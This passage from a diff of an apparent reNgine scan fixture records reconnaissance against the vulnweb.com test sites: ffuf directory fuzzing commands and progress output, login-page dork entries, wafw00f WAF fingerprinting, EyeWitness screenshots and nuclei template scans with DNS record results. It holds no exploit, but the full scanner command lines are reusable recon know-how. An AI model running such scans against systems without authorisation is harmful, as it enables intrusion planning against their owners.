::\n\u001b[2K:: Progress: [4231/4842] :: Job [1/1] :: 98 req/sec :: Duration: [0:01:51] :: Errors: 56 ::\n\u001b[2K:: Progress: [4235/4842] :: Job [1/1] :: 93 req/sec :: Duration: [0:01:51] :: Errors: 56 ::\n\u001b[2K:: Progress: [4240/4842] :: Job [1/1] :: 88 req/sec :: Duration: [0:01:51] :: Errors: 56 ::\n\u001b[2K:: Progress: [4256/4842] :: Job [1/1] :: 83 req/sec :: Duration: [0:01:52] :: Errors: 56 ::\n\u001b[2K:: Progress: [4274/4842] :: Job [1/1] :: 89 req/sec :: Duration: [0:01:52] :: Errors: 56 ::\n\u001b[2K:: Progress: [4287/4842] :: Job [1/1] :: 96 req/sec :: Duration: [0:01:52] :: Errors: 56 ::\n\u001b[2K:: Progress: [4288/4842] :: Job [1/1] :: 95 req/sec :: Duration: [0:01:52] :: Errors: 56 ::\n\u001b[2K:: Progress: [4288/4842] :: Job [1/1] :: 95 req/sec :: Duration: [0:01:52] :: Errors: 56 ::\n\u001b[2K:: Progress: [4318/4842] :: Job [1/1] :: 101 req/sec :: Duration: [0:01:52] :: Errors: 56 ::\n\u001b[2K:: Progress: [4319/4842] :: Job [1/1] :: 94 req/sec :: Duration: [0:01:52] :: Errors: 56 ::\n\u001b[2K:: Progress: [4319/4842] :: Job [1/1] :: 94 req/sec :: Duration: [0:01:52] :: Errors: 56 ::\n\u001b[2K:: Progress: [4340/4842] :: Job [1/1] :: 86 req/sec :: Duration: [0:01:53] :: Errors: 56 ::\n\u001b[2K:: Progress: [4349/4842] :: Job [1/1] :: 93 req/sec :: Duration: [0:01:53] :: Errors: 56 ::\n\u001b[2K:: Progress: [4349/4842] :: Job [1/1] :: 93 req/sec :: Duration: [0:01:53] :: Errors: 56 ::\n\u001b[2K:: Progress: [4361/4842] :: Job [1/1] :: 79 req/sec :: Duration: [0:01:53] :: Errors: 56 ::\n\u001b[2K:: Progress: [4379/4842] :: Job [1/1] :: 82 req/sec :: Duration: [0:01:53] :: Errors: 56 ::\n\u001b[2K:: Progress: [4382/4842] :: Job [1/1] :: 78 req/sec :: Duration: [0:01:53] :: Errors: 56 ::\n\u001b[2K:: Progress: [4399/4842] :: Job [1/1] :: 85 req/sec :: Duration: [0:01:53] :: Errors: 56 ::\n\u001b[2K:: Progress: [4410/4842] :: Job [1/1] :: 81 req/sec :: Duration: [0:01:53] :: Errors: 56 ::\n\u001b[2K:: Progress: [4412/4842] :: Job [1/1] :: 76 req/sec :: Duration: [0:01:54] :: Errors: 56 ::\n\u001b[2K:: Progress: [4428/4842] :: Job [1/1] :: 78 req/sec :: Duration: [0:01:54] :: Errors: 56 ::\n\u001b[2K:: Progress: [4441/4842] :: Job [1/1] :: 88 req/sec :: Duration: [0:01:54] :: Errors: 56 ::\n\u001b[2K:: Progress: [4446/4842] :: Job [1/1] :: 82 req/sec :: Duration: [0:01:54] :: Errors: 56 ::\n\u001b[2K:: Progress: [4457/4842] :: Job [1/1] :: 78 req/sec :: Duration: [0:01:54] :: Errors: 56 ::\n\u001b[2K:: Progress: [4474/4842] :: Job [1/1] :: 91 req/sec :: Duration: [0:01:54] :: Errors: 56 ::\n\u001b[2K:: Progress: [4480/4842] :: Job [1/1] :: 85 req/sec :: Duration: [0:01:54] :: Errors: 56 ::\n\u001b[2K:: Progress: [4487/4842] :: Job [1/1] :: 80 req/sec :: Duration: [0:01:54] :: Errors: 56 ::\n\u001b[2K:: Progress: [4505/4842] :: Job [1/1] :: 92 req/sec :: Duration: [0:01:55] :: Errors: 56 ::\n\u001b[2K:: Progress: [4505/4842] :: Job [1/1] :: 92 req/sec :: Duration: [0:01:55] :: Errors: 56 ::\n\u001b[2K:: Progress: [4518/4842] :: Job [1/1] :: 81 req/sec :: Duration: [0:01:55] :: Errors: 56 ::\n\u001b[2K:: Progress: [4533/4842] :: Job [1/1] :: 88 req/sec :: Duration: [0:01:55] :: Errors: 56 ::\n\u001b[2K:: Progress: [4533/4842] :: Job [1/1] :: 88 req/sec :: Duration: [0:01:55] :: Errors: 56 ::\n\u001b[2K:: Progress: [4543/4842] :: Job [1/1] :: 75 req/sec :: Duration: [0:01:55] :: Errors: 56 ::\n\u001b[2K:: Progress: [4564/4842] :: Job [1/1] :: 86 req/sec :: Duration: [0:01:55] :: Errors: 56 ::\n\u001b[2K:: Progress: [4564/4842] :: Job [1/1] :: 86 req/sec :: Duration: [0:01:55] :: Errors: 56 ::\n\u001b[2K:: Progress: [4580/4842] :: Job [1/1] :: 84 req/sec :: Duration: [0:01:56] :: Errors: 56 ::\n\u001b[2K:: Progress: [4592/4842] :: Job [1/1] :: 82 req/sec :: Duration: [0:01:56] :: Errors: 56 ::\n\u001b[2K:: Progress: [4600/4842] :: Job [1/1] :: 86 req/sec :: Duration: [0:01:56] :: Errors: 56 ::\n\u001b[2K:: Progress: [4606/4842] :: Job [1/1] :: 80 req/sec :: Duration: [0:01:56] :: Errors: 56 ::\n\u001b[2K:: Progress: [4614/4842] :: Job [1/1] :: 77 req/sec :: Duration: [0:01:56] :: Errors: 56 ::\n\u001b[2K:: Progress: [4634/4842] :: Job [1/1] :: 87 req/sec :: Duration: [0:01:56] :: Errors: 56 ::\n\u001b[2K:: Progress: [4636/4842] :: Job [1/1] :: 79 req/sec :: Duration: [0:01:56] :: Errors: 56 ::\n\u001b[2K:: Progress: [4646/4842] :: Job [1/1] :: 79 req/sec :: Duration: [0:01:56] :: Errors: 56 ::\n\u001b[2K:: Progress: [4666/4842] :: Job [1/1] :: 86 req/sec :: Duration: [0:01:57] :: Errors: 56 ::\n\u001b[2K:: Progress: [4669/4842] :: Job [1/1] :: 81 req/sec :: Duration: [0:01:57] :: Errors: 56 ::\n\u001b[2K:: Progress: [4669/4842] :: Job [1/1] :: 81 req/sec :: Duration: [0:01:57] :: Errors: 56 ::\n\u001b[2K:: Progress: [4690/4842] :: Job [1/1] :: 87 req/sec :: Duration: [0:01:57] :: Errors: 56 ::\n\u001b[2K:: Progress: [4690/4842] :: Job [1/1] :: 87 req/sec :: Duration: [0:01:57] :: Errors: 56 ::\n\u001b[2K:: Progress: [4703/4842] :: Job [1/1] :: 78 req/sec :: Duration: [0:01:57] :: Errors: 56 ::\n\u001b[2K:: Progress: [4707/4842] :: Job [1/1] :: 71 req/sec :: Duration: [0:01:57] :: Errors: 56 ::\n\u001b[2K:: Progress: [4720/4842] :: Job [1/1] :: 78 req/sec :: Duration: [0:01:57] :: Errors: 56 ::\n\u001b[2K:: Progress: [4726/4842] :: Job [1/1] :: 73 req/sec :: Duration: [0:01:58] :: Errors: 56 ::\n\u001b[2K:: Progress: [4733/4842] :: Job [1/1] :: 72 req/sec :: Duration: [0:01:58] :: Errors: 56 ::\n\u001b[2K:: Progress: [4743/4842] :: Job [1/1] :: 72 req/sec :: Duration: [0:01:58] :: Errors: 56 ::\n\u001b[2K:: Progress: [4749/4842] :: Job [1/1] :: 67 req/sec :: Duration: [0:01:58] :: Errors: 56 ::\n\u001b[2K:: Progress: [4755/4842] :: Job [1/1] :: 70 req/sec :: Duration: [0:01:58] :: Errors: 56 ::\n\u001b[2K:: Progress: [4774/4842] :: Job [1/1] :: 74 req/sec :: Duration: [0:01:58] :: Errors: 56 ::\n\u001b[2K:: Progress: [4785/4842] :: Job [1/1] :: 74 req/sec :: Duration: [0:01:58] :: Errors: 56 ::\n\u001b[2K:: Progress: [4788/4842] :: Job [1/1] :: 73 req/sec :: Duration: [0:01:58] :: Errors: 56 ::\n\u001b[2K:: Progress: [4808/4842] :: Job [1/1] :: 73 req/sec :: Duration: [0:01:59] :: Errors: 56 ::\n\u001b[2K:: Progress: [4808/4842] :: Job [1/1] :: 73 req/sec :: Duration: [0:01:59] :: Errors: 56 ::\n\u001b[2K:: Progress: [4811/4842] :: Job [1/1] :: 65 req/sec :: Duration: [0:01:59] :: Errors: 56 ::\n\u001b[2K:: Progress: [4832/4842] :: Job [1/1] :: 73 req/sec :: Duration: [0:01:59] :: Errors: 56 ::\n\u001b[2K:: Progress: [4842/4842] :: Job [1/1] :: 76 req/sec :: Duration: [0:01:59] :: Errors: 56 ::\n\u001b[2K:: Progress: [4842/4842] :: Job [1/1] :: 46 req/sec :: Duration: [0:02:01] :: Errors: 56 ::\n", + "time": "2024-11-13T02:34:17.045Z" } }, { - "model": "startScan.directoryscan", - "pk": 3, + "model": "startScan.command", + "pk": 95, "fields": { - "command_line": "ffuf -w /home/rengine/wordlists/fuzz-Bo0oM.txt -p 0.05 -t 30 -timeout 5 -ac -mc 200,204 -u http://testaspnet.vulnweb.com/FUZZ -json", - "scanned_date": "2024-09-03T22:06:42.524Z", - "directory_files": [ - 7, - 8, - 9 - ], - "dir_subscan_ids": [] + "scan_history": 1, + "activity": 8, + "command": "wafw00f -i /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/input_endpoints_waf_detection.txt -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_waf_detection.txt", + "return_code": 0, + "output": "\n\n\u001b[1;97m______\n\u001b[1;97m/ \\\n\u001b[1;97m( Woof! )\n\u001b[1;97m\\ ____/ \u001b[1;91m)\n\u001b[1;97m,, \u001b[1;91m) (\u001b[1;93m_\n\u001b[1;93m.-. \u001b[1;97m- \u001b[1;92m_______ \u001b[1;91m( \u001b[1;93m|__|\n\u001b[1;93m()``; \u001b[1;92m|==|_______) \u001b[1;91m.)\u001b[1;93m|__|\n\u001b[1;93m/ (' \u001b[1;92m/|\\ \u001b[1;91m( \u001b[1;93m|__|\n\u001b[1;93m( / ) \u001b[1;92m / | \\ \u001b[1;91m. \u001b[1;93m|__|\n\u001b[1;93m\\(_)_)) \u001b[1;92m/ | \\ \u001b[1;93m|__|\u001b[0m\n\n\u001b[1;96m~ WAFW00F : \u001b[1;94mv2.2.0 ~\u001b[1;97m\nThe Web Application Firewall Fingerprinting Toolkit\n\u001b[0m\n[*] Checking http://rest.vulnweb.com\n[+] Generic Detection results:\n[-] No WAF detected by the generic detection\n[~] Number of requests: 7\n[*] Checking http://testasp.vulnweb.com\n[+] Generic Detection results:\n[-] No WAF detected by the generic detection\n[~] Number of requests: 7\n[*] Checking http://testaspnet.vulnweb.com\n[+] The site \u001b[1;94mhttp://testaspnet.vulnweb.com\u001b[0m is behind \u001b[1;96mRequestValidationMode (Microsoft)\u001b[0m WAF.\n[~] Number of requests: 2\n[*] Checking http://testhtml5.vulnweb.com\n[+] Generic Detection results:\n[-] No WAF detected by the generic detection\n[~] Number of requests: 7\n[*] Checking http://testphp.vulnweb.com\n[+] Generic Detection results:\n[-] No WAF detected by the generic detection\n[~] Number of requests: 7\n[*] Checking http://vulnweb.com\n[+] Generic Detection results:\n[-] No WAF detected by the generic detection\n[~] Number of requests: 7\n[*] Checking http://www.vulnweb.com\n[+] Generic Detection results:\n[-] No WAF detected by the generic detection\n[~] Number of requests: 7", + "time": "2024-11-13T02:34:17.130Z" } }, { - "model": "startScan.directoryscan", - "pk": 4, + "model": "startScan.command", + "pk": 96, "fields": { - "command_line": "ffuf -w /home/rengine/wordlists/fuzz-Bo0oM.txt -p 0.05 -t 30 -timeout 5 -ac -mc 200,204 -u http://testhtml5.vulnweb.com/FUZZ -json", - "scanned_date": "2024-09-03T22:07:57.153Z", - "directory_files": [ - 10, - 11, - 12, - 13, - 14, - 15 - ], - "dir_subscan_ids": [] + "scan_history": 1, + "activity": 9, + "command": "EyeWitness -f /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/endpoints_alive.txt -d /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/screenshots --no-prompt --timeout 10 --threads 40", + "return_code": 0, + "output": "\nTERM environment variable not set.\n################################################################################\n# EyeWitness #\n################################################################################\n# Red Siege Information Security - https://www.redsiege.com #\n################################################################################\n\nStarting Web Requests (7 Hosts)\nAttempting to screenshot http://rest.vulnweb.com\nAttempting to screenshot http://testasp.vulnweb.com\nAttempting to screenshot http://testaspnet.vulnweb.com\nAttempting to screenshot http://testhtml5.vulnweb.com\nAttempting to screenshot http://testphp.vulnweb.com\nAttempting to screenshot http://vulnweb.com\nAttempting to screenshot http://www.vulnweb.com\nFinished in 24.086135864257812 seconds", + "time": "2024-11-13T02:34:17.137Z" } }, { - "model": "startScan.directoryscan", - "pk": 5, + "model": "startScan.command", + "pk": 97, "fields": { - "command_line": "ffuf -w /home/rengine/wordlists/fuzz-Bo0oM.txt -p 0.05 -t 30 -timeout 5 -ac -mc 200,204 -u http://testphp.vulnweb.com/FUZZ -json", - "scanned_date": "2024-09-03T22:09:11.505Z", - "directory_files": [ - 16, - 17, - 18, - 19, - 20, - 21, - 22, - 23, - 24, - 25, - 26, - 27, - 28, - 29, - 30, - 31, - 32, - 33, - 34, - 35, - 36, - 37 - ], - "dir_subscan_ids": [] + "scan_history": 1, + "activity": 10, + "command": "cat /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/input_endpoints_vulnerability_scan.txt | unfurl -u format %s://%d%p |uro > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_unfurled.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:34:17.597Z" } }, { - "model": "startScan.directoryscan", - "pk": 6, + "model": "startScan.command", + "pk": 98, "fields": { - "command_line": "ffuf -w /home/rengine/wordlists/fuzz-Bo0oM.txt -p 0.05 -t 30 -timeout 5 -ac -mc 200,204 -u http://vulnweb.com/FUZZ -json", - "scanned_date": "2024-09-03T22:10:26.882Z", - "directory_files": [ - 38 - ], - "dir_subscan_ids": [] + "scan_history": 1, + "activity": 10, + "command": "sort -u /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_unfurled.txt -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_unfurled.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:34:17.681Z" } }, { - "model": "startScan.directoryscan", - "pk": 7, + "model": "startScan.command", + "pk": 99, "fields": { - "command_line": "ffuf -w /home/rengine/wordlists/fuzz-Bo0oM.txt -p 0.05 -t 30 -timeout 5 -ac -mc 200,204 -u http://www.vulnweb.com/FUZZ -json", - "scanned_date": "2024-09-03T22:11:40.431Z", - "directory_files": [ - 39 - ], - "dir_subscan_ids": [] + "scan_history": 1, + "activity": 10, + "command": "nuclei -update-templates", + "return_code": 0, + "output": "\n\n__ _\n____ __ _______/ /__ (_)\n/ __ \\/ / / / ___/ / _ \\/ /\n/ / / / /_/ / /__/ / __/ /\n/_/ /_/\\__,_/\\___/_/\\___/_/ v3.2.6\n\nprojectdiscovery.io\n\n[\u001b[34mINF\u001b[0m] No new updates found for nuclei templates", + "time": "2024-11-13T02:34:17.697Z" } }, { - "model": "startScan.dork", - "pk": 1, + "model": "startScan.command", + "pk": 100, "fields": { - "type": "login_pages", - "url": "http://rest.vulnweb.com/basic_authentication/api/" + "scan_history": 1, + "activity": 11, + "command": "nuclei -j -irr -l /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_unfurled.txt -c 50 -retries 1 -rl 150 -timeout 5 -silent -t /home/rengine/nuclei-templates -severity unknown", + "return_code": 0, + "output": null, + "time": "2024-11-13T02:34:18.296Z" } }, { - "model": "startScan.dork", - "pk": 2, + "model": "startScan.command", + "pk": 101, "fields": { - "type": "login_pages", - "url": "http://rest.vulnweb.com/docs/" + "scan_history": 1, + "activity": 12, + "command": "nuclei -j -irr -l /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_unfurled.txt -c 50 -retries 1 -rl 150 -timeout 5 -silent -t /home/rengine/nuclei-templates -severity info", + "return_code": 0, + "output": "{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 59703\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 59703\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:33.187553379Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"testasp.vulnweb.com\",\"matched-at\":\"testasp.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 6700\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testasp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 6700\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testasp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestasp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\ntestasp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:9QFopDZwL4Fw1z9RU7_L1QQqIpeZNgyuufqN44mRG8w\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:33.201221624Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testasp.vulnweb.com\",\"matched-at\":\"testasp.vulnweb.com\",\"extracted-results\":[\"\\\"v=spf1 -all\\\"\",\"\\\"google-site-verification:9QFopDZwL4Fw1z9RU7_L1QQqIpeZNgyuufqN44mRG8w\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 6700\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testasp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 6700\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testasp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestasp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\ntestasp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:9QFopDZwL4Fw1z9RU7_L1QQqIpeZNgyuufqN44mRG8w\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:33.201348884Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 49087\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 49087\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:33.212984212Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"\\\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 49087\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 49087\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:33.213072277Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"testasp.vulnweb.com\",\"matched-at\":\"testasp.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 26302\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testasp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 26302\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testasp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestasp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:9QFopDZwL4Fw1z9RU7_L1QQqIpeZNgyuufqN44mRG8w\\\"\\ntestasp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:33.223109963Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testasp.vulnweb.com\",\"matched-at\":\"testasp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:9QFopDZwL4Fw1z9RU7_L1QQqIpeZNgyuufqN44mRG8w\\\"\",\"\\\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 26302\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testasp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 26302\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testasp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestasp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:9QFopDZwL4Fw1z9RU7_L1QQqIpeZNgyuufqN44mRG8w\\\"\\ntestasp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:33.223220829Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"testasp.vulnweb.com\",\"matched-at\":\"testasp.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 33573\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, 